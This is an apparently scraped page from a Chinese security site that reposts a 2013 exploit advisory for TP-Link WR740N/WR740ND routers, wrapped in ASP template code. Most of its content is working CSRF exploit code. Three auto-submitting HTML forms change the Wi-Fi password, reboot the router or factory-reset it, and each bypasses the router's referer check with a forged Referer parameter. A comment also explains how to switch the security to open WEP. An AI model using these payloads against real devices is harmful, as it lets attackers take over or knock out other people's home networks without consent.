<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("CSRF漏洞,多个CSRF漏洞") PageTitle=stripHTML("TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities") ArticleIntro=stripHTML("") Articlecontent=stripHTML("              # Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities# Date…") ModuleName = stripHTML("exploits") InfoID = stripHTML("116624") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> Exploit >> 正文


2013/11/28 作者:不详 来源: 华盟收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>















# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities
# Date: 11/24/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage: http://tplink.com
# Category: Hardware/Wireless Router
# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below
# Tested on: WR740N/WR740ND (May be possible on other models)
Technical Details
TPLINK WIreless Router WR740N has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router,Change Settings by simply making the user visit a CSRF link.
Application uses "HTTP-REFERER" check functionality to check for CSRF attacks. But it can easily be bypassed using the "Referer" parameter with value set to target's I.P in the GET request.
Exploit Code
Change WPA/WPA2 password by CSRF
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/WlanSecurityRpm.htm"
method="GET" name="form">
<input type="hidden" name="secType" value="3">
<input type="hidden" name="pskSecOpt" value="3">
<input type="hidden" name="pskCipher" value="3">
<input type="hidden" name="pskSecret" value="[WPA/WPA2_PASSWORD]">
<input type="hidden" name="interval" value="0">
<input type="hidden" name="wpaSecOpt" value="3">
<input type="hidden" name="wpaCipher" value="1">
<input type="hidden" name="radiusIP" value="">
<input type="hidden" name="rediusPort" value="1812">
<input type="hidden" name="radiusSecret" value="">
<input type="hidden" name="IntervalWpa" value="0">
<input type="hidden" name="webSecOpt" value="1">
<input type="hidden" name="keytype" value="1">
<input type="hidden" name="keynum" value="1">
<input type="hidden" name="key1" value="">
<input type="hidden" name="length1" value="0">
<input type="hidden" name="key2" value="">
<input type="hidden" name="length2" value="0">
<input type="hidden" name="key3" value="">
<input type="hidden" name="length3" value="0">
<input type="hidden" name="key4" value="">
<input type="hidden" name="length4" value="0">
<input type="hidden" name="Save" value="Save">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
#For Changing the Security to Open WEP, simply change "secType" value to 1.
Reboot Router by CSRF
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/SysRebootRpm.htm"
method="GET" name="form">
<input type="hidden" name="Reboot" value="Reboot">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
Factory Reset the Router
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/RestoreDefaultCfgRpm.htm"
method="GET" name="form">
<input type="hidden" name="Restorefactory" value="Restore">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
twitter : @samanL33T <https://twitter.com/samanL33T>

  • 上一篇漏洞:

  • 下一篇漏洞: